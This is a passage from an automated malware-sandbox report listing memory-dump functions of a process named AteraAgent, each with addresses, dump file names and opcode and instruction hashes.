                                                                                                                                                                                                                                                                                                • Instruction ID: fa398ea62d3ef90eb2c18996423f5c705ba3d39513010a6e8c9d6a354e2d1b51
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd48a83d8c03763d5db20a987f4e7c31ba1317019cac5d0e37c2354c583aaba5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BC919271A18A8E8FEB84EF58C894BE977F1FF58300F11427AD41DC7296DA30A846CB41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38E9F2 Relevance: .3, Instructions: 253COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 914d8385abcf37de342480a4345d723c847a93515cf9544a8be85265015a88ef
                                                                                                                                                                                                                                                                                                • Instruction ID: d70453decd6d52796ac4582dd61e38ead6b6dd4f95e70fe0b7da333158e3d7c6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 914d8385abcf37de342480a4345d723c847a93515cf9544a8be85265015a88ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7615622B0FA8A1FE366F66C48691757BE1DF96B5072601FFD08DC71A3DD14AD068381
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59E7F8 Relevance: .2, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4295d4009a18521e593fde4571a742031600fa18743458dd7048dc36e3d1a331
                                                                                                                                                                                                                                                                                                • Instruction ID: 4bff5f30828da70a410746f8e1140b2bfd928ce332f1b36228ecb581fa43ba32
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4295d4009a18521e593fde4571a742031600fa18743458dd7048dc36e3d1a331
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65712570D08A5C8FDB98DF58C885BE9BBB1FB69300F1082AAD04DE3251DB74A985CF41
                                                                                                                                                                                                                                                                                                Function 00007FFD9B384667 Relevance: .2, Instructions: 223COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7eacec8d3372bdc4ae3e127ba4dee7feb0c68fd2b7a4fa814637fc2b5351f799
                                                                                                                                                                                                                                                                                                • Instruction ID: 8358034c1bf1a18f0cc7ae33cb737b50b835239f56b7b0a542b1e3489ddeb5c0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7eacec8d3372bdc4ae3e127ba4dee7feb0c68fd2b7a4fa814637fc2b5351f799
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 87712E70A14A4E8FEB84EF58C895BADB7F1FF68300F514279D41DD7296DA34A846CB40
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38E648 Relevance: .2, Instructions: 213COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 531d60dff74723ea3ff4f0734cd234dcb5c3402015d3d593c5e20be1c6587e9c
                                                                                                                                                                                                                                                                                                • Instruction ID: d0d7db6fbefb2362907e334f193cca4ad29ceb39cf4f8791cea907fc8c38e08e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531d60dff74723ea3ff4f0734cd234dcb5c3402015d3d593c5e20be1c6587e9c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C512531719E0D9FE768EB9CD89597173E0EF55310B15067DD44EC3262D936F9828780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A858 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 286c418ce1cebd3cc20d09f9c01e1af23a97eb6d02237f5f04ee72e7c15f99ef
                                                                                                                                                                                                                                                                                                • Instruction ID: 56bd7b9b6d8a941b591c15f80428dae663525d4ce3003f50d87b3569cf7052c5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 286c418ce1cebd3cc20d09f9c01e1af23a97eb6d02237f5f04ee72e7c15f99ef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E251B542B2FD9E0AF675B2E864311F86B50EF52364B0A43FBD09D461EB9C587A024292
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38A850 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ca28902c345a57691058b760d6fd1123e5319376c99c037f43f4a0f308a88def
                                                                                                                                                                                                                                                                                                • Instruction ID: ca4b06285aab65f731475b9a3279ff3c172c0c3b9cd78e2325a28d3b1e506720
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca28902c345a57691058b760d6fd1123e5319376c99c037f43f4a0f308a88def
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8251D742B2FD9E0BF775B6E864311F86B50EF52360B0943BBD09D461E79C587A424292
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59A048 Relevance: .2, Instructions: 194COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: d7c1d430fe9df94cb66e8493346aa40eaf560a28875dbb98ae657f6ed1b52df0
                                                                                                                                                                                                                                                                                                • Instruction ID: a5eb8d2c285297a7952a31df376ceda48000de5ad18b51b4602baf7aae6564fc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7c1d430fe9df94cb66e8493346aa40eaf560a28875dbb98ae657f6ed1b52df0
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C51C361B2DE4E0BFBEAAB6C54B597477E2EF98340B8401B9D05EC72E7DD19BD018240
                                                                                                                                                                                                                                                                                                Function 00007FFD9B395CF2 Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 38fed0892e5807054b2386507a25d2fed460fbf1ee81ebdca5b4b2e59d02d3a8
                                                                                                                                                                                                                                                                                                • Instruction ID: c63be8d94325cb30ad27781eac6700a9d7f7741b61e21e7730be66a536045cf6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 38fed0892e5807054b2386507a25d2fed460fbf1ee81ebdca5b4b2e59d02d3a8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E8410347B1E5AA06E315B3BCB4736F92B80EF8233974942B7D0DD8A1A7CC44684A8295
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59BC3A Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ca57c5b3ef0fa5642350081cf14dc9e1d64f53b8ba3f557f823a3610413b205c
                                                                                                                                                                                                                                                                                                • Instruction ID: 309ba257d602f8b43db2dacc343f3d4e190c4639443045c1e8c33529dc79244a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca57c5b3ef0fa5642350081cf14dc9e1d64f53b8ba3f557f823a3610413b205c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6651B631618F098FEBE5DF18C4A4A66B3E1FFA8300B450669D04AC7266DE30F981CB81
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38ADFA Relevance: .2, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 4c18fc3c832d1fdb295484610ae2a44f7df6997575444f531cb254dd16f3d855
                                                                                                                                                                                                                                                                                                • Instruction ID: d14db8827e00eb4543c4cb2d9ece804842082d9fd3043ef7aadec63c95a4a523
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c18fc3c832d1fdb295484610ae2a44f7df6997575444f531cb254dd16f3d855
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F412922B1EE8E0FE7A5E7AC94606A537D1FF9525070505BBD04DC7296ED28EC028342
                                                                                                                                                                                                                                                                                                Function 00007FFD9B599694 Relevance: .2, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7308ed032cbedcc4ba1b5403fc3228c0b5d7b20cc52be16884e193056090abba
                                                                                                                                                                                                                                                                                                • Instruction ID: 559ef65a0a93bbacee5c7021de228d4d2f8e1c665a69de4c253f1cfa92bb0ab7
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7308ed032cbedcc4ba1b5403fc3228c0b5d7b20cc52be16884e193056090abba
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E4410821B0EB4A0FE7B58F5C946517277E2EF96610B85017ED489C33ABDE25FC428381
                                                                                                                                                                                                                                                                                                Function 00007FFD9B599F76 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: f8b53c6fa1efe1fa463908cd66c4c74ac90afc11af43587e296735b56e6d6b6c
                                                                                                                                                                                                                                                                                                • Instruction ID: a27262d2d26d279e368d336e417c6719e9009d20d219b183194ad088ce83a3a2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f8b53c6fa1efe1fa463908cd66c4c74ac90afc11af43587e296735b56e6d6b6c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2751F752B2EE8F0BFBEAA76C54A557477D2EF94340B8440B9D05EC72EBED19BD018240
                                                                                                                                                                                                                                                                                                Function 00007FFD9B3972BE Relevance: .2, Instructions: 172COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 1090adb1733e92c4c2365da3f30a9d0fb5b1a27024538fd09aa3ca89604dab9e
                                                                                                                                                                                                                                                                                                • Instruction ID: c0aa490e038aab3d3d5bd0d4ed9b3b1f7a69907785a7afc67cabc26a690928a5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1090adb1733e92c4c2365da3f30a9d0fb5b1a27024538fd09aa3ca89604dab9e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E51D430B1DF4E8BE768EB188462665B7D2FFA8740F51417ED44DC32E6DE24A9018782
                                                                                                                                                                                                                                                                                                Function 00007FFD9B39AFB9 Relevance: .2, Instructions: 170COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 6afb1d81ca5b0006068248e953785fb600d6d190fe6fda681119de423e1a8cce
                                                                                                                                                                                                                                                                                                • Instruction ID: b79933444e5c95d6f7bab45117bed0225aa361e771d7e4a6b15df9885a07075a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6afb1d81ca5b0006068248e953785fb600d6d190fe6fda681119de423e1a8cce
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EE511670E1961D8FDB68EFA8C4A57ACBBB1FF58304F51006ED009E7292DB35A981CB00
                                                                                                                                                                                                                                                                                                Function 00007FFD9B393C30 Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: ff7565ef917b8c6496ea493f1e6ccaeb9f2e83fbf44f9640daaa9dff1924f9bf
                                                                                                                                                                                                                                                                                                • Instruction ID: 5ccfa57f3939f881361ef50547cf07df5b344027c1062f621a340bbb52b4db23
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ff7565ef917b8c6496ea493f1e6ccaeb9f2e83fbf44f9640daaa9dff1924f9bf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9041EF31619B0E8FE778EB68C894A6173E0EF58300B56067DD44EC7666DA39F882C780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B392C9D Relevance: .2, Instructions: 168COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 40c78ba13cbb9f034ddfeb960fa81886f5bb80d977516b94ef400aa5ec1d4836
                                                                                                                                                                                                                                                                                                • Instruction ID: 943124f09248e99303ab762742413cbdb7123cdb2865b018751213d90cc5b6f0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40c78ba13cbb9f034ddfeb960fa81886f5bb80d977516b94ef400aa5ec1d4836
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A41F43171D90C4FEB68FA5CA86967437C2EF99310B0641BDE45EC32A7DD55AC828782
                                                                                                                                                                                                                                                                                                Function 00007FFD9B397126 Relevance: .2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 7ec14af0e0bef63cdbd1d601a0196ae5dfbe02839a48e66f1b5de43e8b4be46d
                                                                                                                                                                                                                                                                                                • Instruction ID: d8d82a09ea30e30d1cf2957e1e9c08fd9a0293df1ad0c75781706919d86fd16f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ec14af0e0bef63cdbd1d601a0196ae5dfbe02839a48e66f1b5de43e8b4be46d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 96518F70A1DB498FE778EF288459766B7E1FFA9301F01457ED489C32A2DF34A8418B42
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59826D Relevance: .1, Instructions: 149COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 3115b531969942137c02530f5e1ebff530b4b374922ecf7054443303a15932bd
                                                                                                                                                                                                                                                                                                • Instruction ID: f8911ef2d0e377d4a6f5884568e859c422eba4c3e626719515c2d237ff6be24a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3115b531969942137c02530f5e1ebff530b4b374922ecf7054443303a15932bd
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D41F931A09A4D8FDB94EF58C861AE977B2FFA8340F45017AE409D32A6CE35E945C780
                                                                                                                                                                                                                                                                                                Function 00007FFD9B59000A Relevance: .1, Instructions: 147COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2427886021.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b590000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 2c9e52b743fd41678c7a98bbf11982f1a673e3a4df341bb1abbcdc837a9e9402
                                                                                                                                                                                                                                                                                                • Instruction ID: b8542a20404479a236aa1f659e287eb5666e6db51f12f5cb5cd902be3777e419
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c9e52b743fd41678c7a98bbf11982f1a673e3a4df341bb1abbcdc837a9e9402
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B841CF6150FBC95FEB97CB788C758A53FB0EF12610B4E05EBD088CB0A3D519A949C751
                                                                                                                                                                                                                                                                                                Function 00007FFD9B390610 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 653d3d42c55edf092b77c2962c65d8dab965cce07f8c253efb8c1ce1c1a3f830
                                                                                                                                                                                                                                                                                                • Instruction ID: 075bb29f1e4d1c7ee5e75e7887d5fbef16be9ee2814f777a5a12e54f891ba120
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 653d3d42c55edf092b77c2962c65d8dab965cce07f8c253efb8c1ce1c1a3f830
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81414331B19E0D8FDBA8EF58986567A37D1FFA8350F11017EE41DD3295CE35A9018781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B394BF0 Relevance: .1, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 26599b9c806b2834de3ca54507c40a56d929ad4fffd8a23aa89fcce6cd341a2e
                                                                                                                                                                                                                                                                                                • Instruction ID: 3aec355ad7e5bc5f3b007620aa2a0a9d02f7b8f16523a7dd101dca4e3ee2de8d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26599b9c806b2834de3ca54507c40a56d929ad4fffd8a23aa89fcce6cd341a2e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4041E621B1AD4E4FE7B9E76C846467977D1EF99200B0940FED04EC32A6DE18AD068781
                                                                                                                                                                                                                                                                                                Function 00007FFD9B38577D Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2400332822.00007FFD9B380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B380000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_7ffd9b380000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 369fb86ef4a9b03e3509c819d041809b52ae22909e9ef59cf33387e49f5c1218
